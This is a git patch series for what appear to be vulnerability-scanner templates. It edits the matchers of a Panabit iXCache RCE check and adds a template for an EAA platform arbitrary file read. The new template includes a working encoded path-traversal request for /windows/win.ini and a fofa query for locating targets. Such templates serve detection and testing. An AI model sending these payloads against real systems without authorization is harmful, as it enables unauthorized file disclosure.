From c03b29bb69a959ce67037f556bfe27d62fa73802 Mon Sep 17 00:00:00 2001
From: momika233 <56291820+momika233@users.noreply.github.com>
Date: Wed, 9 Aug 2023 04:48:31 +0800
Subject: [PATCH 1/2] Update panabit-ixcache-date-config-rce.yaml

---
 .../other/panabit-ixcache-date-config-rce.yaml      | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/http/vulnerabilities/other/panabit-ixcache-date-config-rce.yaml b/http/vulnerabilities/other/panabit-ixcache-date-config-rce.yaml
index 0bbda04eb5..99f67a6d16 100644
--- a/http/vulnerabilities/other/panabit-ixcache-date-config-rce.yaml
+++ b/http/vulnerabilities/other/panabit-ixcache-date-config-rce.yaml
@@ -42,14 +42,11 @@ http:
         - ixcache
     matchers-condition: and
     matchers:
- 
-      - type: word
-        words:
-          - "_cmd" 
-          - "_config"
-        part: body
-        condition: and        
- 
+
+      - type: regex
+        regex:
+          - "monitor.*"
+
       - type: status
         status:
           - 200

From c2290f1bc3ccaa11554387c4ff2d777eb48bae5b Mon Sep 17 00:00:00 2001
From: momika233 <56291820+momika233@users.noreply.github.com>
Date: Wed, 9 Aug 2023 05:01:55 +0800
Subject: [PATCH 2/2] Add files via upload

---
 .../EAA-Arbitrary-File-Read.yaml              | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 http/vulnerabilities/EAA-Arbitrary-File-Read.yaml

diff --git a/http/vulnerabilities/EAA-Arbitrary-File-Read.yaml b/http/vulnerabilities/EAA-Arbitrary-File-Read.yaml
new file mode 100644
index 0000000000..aa6d5273ff
--- /dev/null
+++ b/http/vulnerabilities/EAA-Arbitrary-File-Read.yaml
@@ -0,0 +1,31 @@
+id: EAA-Arbitrary-File-Read
+
+info:
+  name: EAA Arbitrary file read
+  author: momika233
+  severity: high
+  description: |
+    Ting Zhi Technology VA virtual application platform arbitrary file reading vulnerability
+  reference:
+    - http://www.tzfse.com.cn/
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: body="EAA益和应用接入系统"
+  tags: EAA,Arbitrary-File-Read
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - "extensions.*"